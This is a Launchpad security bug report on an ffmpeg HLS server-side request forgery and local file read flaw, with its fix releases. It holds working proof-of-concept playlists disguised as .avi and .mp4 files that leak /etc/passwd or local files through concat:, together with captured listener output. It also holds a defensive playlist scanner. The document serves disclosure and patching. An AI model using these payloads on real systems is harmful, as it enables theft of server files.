ffmpeg allows Server-Side Request Forgery attack

Bug #1533367 reported by Filipp Frizzy on 2016-01-12
Affects          Importance  Assigned to
ffmpeg (Ubuntu)  Medium      Unassigned
Vivid            Medium      Unassigned
Wily             Medium      Unassigned
Xenial           Medium      Unassigned

Bug Description

There is a Russian blog post about SSRF and local file read with ffmpeg:
http://habrahabr.ru/company/mailru/blog/274855/

One of variants:
$ cat /tmp/test.m3u8
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://localhost:8080?

(The last line, http://*, has no trailing \n)

$ cat /tmp/test.avi
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:file:///tmp/test.m3u8|file:///tmp/test
#EXT-X-ENDLIST

$ cat /tmp/test
qwerty
123456

Open test.avi with smplayer or even kde baloo:

$ nc -v -l 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 47636)
GET ?qwerty HTTP/1.1
User-Agent: Lavf/56.1.0
Accept: */*
Range: bytes=0-
Connection: close
Host: localhost:8080
Icy-MetaData: 1

Localhost and local test.m3u8 can be changed to remote server.
File extension does not matter.

There is another attack with thumbnails:
$ cat header.y4m
YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
FRAME

$ cat video.mp4
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://example.org/header.y4m|file:///etc/passwd
#EXT-X-ENDLIST

$ ffmpeg -i video.mp4 thumbnail.png
$ ffmpeg -i thumbnail.png out.y4m
$ cat out.y4m
YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono
FRAME
# $FreeBSD: release/10.0.0/etc/master.passwd 256366 2013-10-12 06:08:18Z rpaulo $
#
root:*:0:0:Charlie &:/root:/usr/local/bin/zsh
toor:*:0:0:Bourne-again Superuser:/root:

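The two playlists above work because the HLS demuxer is selected by content (the #EXTM3U magic), not by extension, and because a segment line is passed through ffmpeg's URL layer, where concat: and subfile: can chain a local file into an HTTP request or into the decoded output. The scanner below is an added example (not ffmpeg code and not from the reporter) that applies the rule the upstream fix later enforces, "forbid all protocols except http(s) & file", to a playlist before it reaches a media library. It walks nested ffmpeg-style URIs so that a concat: or subfile: wrapper around an otherwise harmless http: or file: target is still caught, and it reports a plain file: segment separately, since the fix still allows it. The sample playlists are constructed inline from the report's PoC; the scheme-parsing rules are a simplification of ffmpeg's protocol lookup, not a reimplementation of it.

```python
import re

# Schemes the 2.7.5 fix keeps allowing for HLS segments
# ("avformat/hls: forbid all protocols except http(s) & file").
ALLOWED_SCHEMES = {"http", "https", "file"}

# Scheme token as ffmpeg's protocol lookup reads it: alnum, '+', '-', '.'.
# "subfile,,start,...,:" is the one protocol whose options precede the ':'.
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*)(?=[:,])")


def uri_schemes(uri):
    """Return every scheme an ffmpeg-style nested URI chains through.

    'concat:file:///tmp/a|http://x'               -> ['concat', 'file', 'http']
    'subfile,,start,0,end,0,,:file:///etc/passwd' -> ['subfile', 'file']
    'seg0.ts'                                     -> []   (relative path)
    """
    m = _SCHEME_RE.match(uri)
    if not m or ":" not in uri:
        return []
    scheme = m.group(1).lower()
    # Only subfile takes ','-separated options before the ':'; any other
    # token followed by ',' is just a file name, not a scheme.
    if uri[m.end()] == "," and scheme != "subfile":
        return []
    rest = uri.split(":", 1)[1]
    if scheme == "concat":
        inner = []
        for part in rest.split("|"):   # concat:a|b|c opens each piece in turn
            inner.extend(uri_schemes(part))
        return [scheme] + inner
    return [scheme] + uri_schemes(rest)


def looks_like_hls(data):
    """ffmpeg probes HLS on content, so test.avi / video.mp4 starting with
    #EXTM3U are parsed as playlists regardless of their extension."""
    return data.lstrip().startswith("#EXTM3U")


def scan_playlist(text):
    """Classify each segment line (non-empty, non-'#') of an HLS playlist.

    Verdicts:
      'blocked' - uses a scheme outside http/https/file (concat, subfile, ...)
      'local'   - reaches a file: URL; accepted by the fix, still a local read
      'ok'      - relative path or http(s)
    """
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        schemes = uri_schemes(line)
        if any(s not in ALLOWED_SCHEMES for s in schemes):
            verdict = "blocked"
        elif "file" in schemes:
            verdict = "local"
        else:
            verdict = "ok"
        findings.append((line, schemes, verdict))
    return findings


# Constructed samples: the two PoC playlists from this report plus a benign one.
POC_AVI = """#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:file:///tmp/test.m3u8|file:///tmp/test
#EXT-X-ENDLIST
"""
POC_MP4 = """#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://example.org/header.y4m|file:///etc/passwd
#EXT-X-ENDLIST
"""
BENIGN = """#EXTM3U
#EXT-X-TARGETDURATION:10
#EXTINF:10.0,
seg0.ts
#EXTINF:10.0,
https://cdn.example.net/seg1.ts
#EXT-X-ENDLIST
"""

if __name__ == "__main__":
    for name, data in (("test.avi", POC_AVI), ("video.mp4", POC_MP4), ("ok.m3u8", BENIGN)):
        print(name, "->", "hls" if looks_like_hls(data) else "not hls")
        for uri, schemes, verdict in scan_playlist(data):
            print("  %-8s %-20s %s" % (verdict, ",".join(schemes) or "-", uri))
```

Running it flags both PoC files as playlists despite their .avi/.mp4 names and marks their single segment 'blocked' because of the concat: wrapper, while the benign playlist passes. A file: segment on its own is reported as 'local' rather than 'ok', which is the case a thumbnailer or indexer processing untrusted uploads should still treat as suspicious.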
Filipp Frizzy (filipp-s-frizzy) wrote :

To read the full file, just switch from 'concat' to 'subfile', as I understood.

affects: ubuntu → ffmpeg (Ubuntu)
Marc Deslauriers (mdeslaur) wrote :

Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https://wiki.ubuntu.com/SecurityTeam/UpdateProcedures

information type: Private Security → Public Security
Changed in ffmpeg (Ubuntu):
status: New → Incomplete

CVE-2016-1897 (concat) and CVE-2016-1898 (subfile) were assigned to this bug, which (among other potentially security relevant issues) is fixed in FFmpeg 2.7.5 (the lines below starting with avformat/hls refer to this bug).

Attached is a debdiff. (git repo is at [1])

Testing performed (in a wily chroot):
 * build including test suite works
 * installation works
 * upgrade works
 * autopkgtests pass

From the upstream Changelog:

version 2.7.5
- configure: bump copyright year to 2016
- avformat/hls: Even stricter URL checks
- avformat/hls: More strict url checks
- swscale/utils: Detect and skip unneeded sws_setColorspaceDetails() calls
- swscale/yuv2rgb: Increase YUV2RGB table headroom
- swscale/yuv2rgb: Factor YUVRGB_TABLE_LUMA_HEADROOM out
- avformat/hls: forbid all protocols except http(s) & file
- avformat/aviobuf: Fix end check in put_str16()
- avformat/asfenc: Check pts
- avcodec/mpeg4video: Check time_incr
- avcodec/wavpackenc: Check the number of channels
- avcodec/wavpackenc: Headers are per channel
- avcodec/aacdec_template: Check id_map
- avcodec/dvdec: Fix "left shift of negative value -254"
- avcodec/mjpegdec: Fix negative shift
- avcodec/mss2: Check for repeat overflow
- avformat: Add integer fps from 31 to 60 to get_std_framerate()
- avcodec/mpegvideo_enc: Clip bits_per_raw_sample within valid range
- avfilter/vf_scale: set proper out frame color range
- avcodec/motion_est: Fix mv_penalty table size
- avcodec/h264_slice: Fix integer overflow in implicit weight computation
- swscale/utils: Use normal bilinear scaler if fast cannot be used due to tiny dimensions
- avcodec/put_bits: Always check buffer end before writing
- mjpegdec: extend check for incompatible values of s->rgb and s->ls
- swscale/utils: Fix intermediate format for cascaded alpha downscaling
- x86/float_dsp: zero extend offset from ff_scalarproduct_float_sse
- avfilter/vf_zoompan: do not free frame we pushed to lavfi

1: https://anonscm.debian.org/cgit/collab-maint/ffmpeg.git/log/?h=wily

Changed in ffmpeg (Ubuntu):
status: Incomplete → Confirmed
Changed in ffmpeg (Ubuntu):
importance: Undecided → Medium
Changed in ffmpeg (Ubuntu Vivid):
status: New → Confirmed
Changed in ffmpeg (Ubuntu Wily):
status: New → Confirmed
Changed in ffmpeg (Ubuntu Vivid):
importance: Undecided → Medium
Changed in ffmpeg (Ubuntu Wily):
importance: Undecided → Medium
Marc Deslauriers (mdeslaur) wrote :

ACK on the debdiff in comment #3. Packages are building now and will be released as a security update today. Thanks!

Filipp Frizzy (filipp-s-frizzy) wrote :

Thank you, guys
Is it also fixed in other packages like Mplayer or KDE Baloo?

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ffmpeg - 7:2.7.5-0ubuntu0.15.10.1

---------------
ffmpeg (7:2.7.5-0ubuntu0.15.10.1) wily-security; urgency=medium

  * Import new upstream bugfix release 2.7.5.
     - Fixes CVE-2016-1897 and CVE-2016-1898. (LP: #1533367)

 -- Andreas Cadhalpun <email address hidden> Fri, 15 Jan 2016 21:05:04 +0100

Changed in ffmpeg (Ubuntu Wily):
status: Confirmed → Fix Released

Filipp, if an issue is fixed in libavformat it doesn't affect programs using this dynamic library (like mplayer) anymore, once they have been restarted after libavformat has been upgraded.

To fix this issue in xenial, 2.8.5-1 needs to be merged from Debian/unstable.

Attached is a debdiff for vivid. (git repo is at [1])

Testing performed (in a vivid chroot):
 * build including test suite works
 * installation works
 * upgrade works
 * no regression in the autopkgtests from 2.8.5-1

From the upstream Changelog:

version 2.5.10
- configure: bump copyright year to 2016
- avformat/hls: Even stricter URL checks
- avformat/hls: More strict url checks
- swscale/utils: Detect and skip unneeded sws_setColorspaceDetails() calls
- swscale/yuv2rgb: Increase YUV2RGB table headroom
- swscale/yuv2rgb: Factor YUVRGB_TABLE_LUMA_HEADROOM out
- avformat/hls: forbid all protocols except http(s) & file
- avformat/aviobuf: Fix end check in put_str16()
- avformat/asfenc: Check pts
- avcodec/mpeg4video: Check time_incr
- avcodec/wavpackenc: Check the number of channels
- avcodec/wavpackenc: Headers are per channel
- avcodec/dvdec: Fix "left shift of negative value -254"
- avcodec/mjpegdec: Fix negative shift
- avcodec/mss2: Check for repeat overflow
- avformat: Add integer fps from 31 to 60 to get_std_framerate()
- avcodec/mpegvideo_enc: Clip bits_per_raw_sample within valid range
- avfilter/vf_scale: set proper out frame color range
- avcodec/motion_est: Fix mv_penalty table size
- avcodec/h264_slice: Fix integer overflow in implicit weight computation
- swscale/utils: Use normal bilinear scaler if fast cannot be used due to tiny dimensions
- avcodec/put_bits: Always check buffer end before writing
- mjpegdec: extend check for incompatible values of s->rgb and s->ls
- swscale/utils: Fix intermediate format for cascaded alpha downscaling
- avcodec/h264_refs: Fix long_idx check
- avfilter/vf_mpdecimate: Add missing emms_c()
- avformat/mxfenc: Do not crash if there is no packet in the first stream
- avformat/utils: estimate_timings_from_pts - increase retry counter, fixes invalid duration for ts files with hevc codec
- avformat/matroskaenc: Check codecdelay before use
- avutil/mathematics: Fix division by 0
- x86/float_dsp: zero extend offset from ff_scalarproduct_float_sse
- avcodec/mpeg4videodec: also for empty partitioned slices
- nuv: sanitize negative fps rate
- rawdec: only exempt BIT0 with need_copy from buffer sanity check
- mlvdec: check that index_entries exist
- nutdec: reject negative value_len in read_sm_data
- xwddec: prevent overflow of lsize * avctx->height
- nutdec: only copy the header if it exists
- exr: fix out of bounds read in get_code
- on2avc: limit number of bits to 30 in get_egolomb
- sonic: make sure num_taps * channels is not larger than frame_size
- opus_silk: fix typo causing overflow in silk_stabilize_lsf
- ffm: reject invalid codec_id and codec_type
- aaccoder: prevent crash of anmr coder
- ffmdec: reject zero-sized chunks
- swscale/x86/rgb2rgb_template: Fallback to mmx in interleaveBytes() if the alignment is insufficient for SSE*
- swscale/x86/rgb2rgb_template: Do not crash on misaligend stride

1: https://anonscm.debian.org/cgit/c...


Marc Deslauriers (mdeslaur) wrote :

ACK on the debdiff in comment #7. Package is building now and will be released as a security update today. Thanks!

Changed in ffmpeg (Ubuntu Vivid):
status: Confirmed → Fix Committed
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ffmpeg - 7:2.5.10-0ubuntu0.15.04.1

---------------
ffmpeg (7:2.5.10-0ubuntu0.15.04.1) vivid-security; urgency=medium

  * Import new upstream bugfix release 2.5.10.
     - Fixes CVE-2016-1897 and CVE-2016-1898. (LP: #1533367)

 -- Andreas Cadhalpun <email address hidden> Tue, 19 Jan 2016 20:24:46 +0100

Changed in ffmpeg (Ubuntu Vivid):
status: Fix Committed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package ffmpeg - 7:2.8.6-1ubuntu1

---------------
ffmpeg (7:2.8.6-1ubuntu1) xenial; urgency=low

  * Merge from Debian unstable. Remaining changes:
    - Compile with -O2 rather than -O3 on s390x, to work around
      https://bugs.launchpad.net/bugs/1526324.
  * Should fix LP: #1533367

ffmpeg (7:2.8.6-1) unstable; urgency=medium

  * Import new upstream bugfix release 2.8.6.
  * Update Standards-Version to 3.9.7.
     - Move documentation from /u/s/d/ffmpeg-doc/ to /u/s/d/ffmpeg/.
  * Use https for the Vcs-Git link.

ffmpeg (7:2.8.5-1) unstable; urgency=medium

  * Import new upstream bugfix release 2.8.5.
     - Fixes CVE-2016-1897 and CVE-2016-1898.
  * Update doc-make-apidoc-output-independent-of-SRC_PATH.patch.
  * Add patch to make out-of-tree builds bit-identical to in-tree-builds.
  * Enable the now available opencv and frei0r on mips64el.
  * Fix altivec-extra compile time optimization.
  * Update copyright year for the debian files.
  * Change priority of libavcodec*-extra* to extra.

 -- Iain Lane <email address hidden> Thu, 25 Feb 2016 17:48:20 +0000

Changed in ffmpeg (Ubuntu Xenial):
status: Confirmed → Fix Released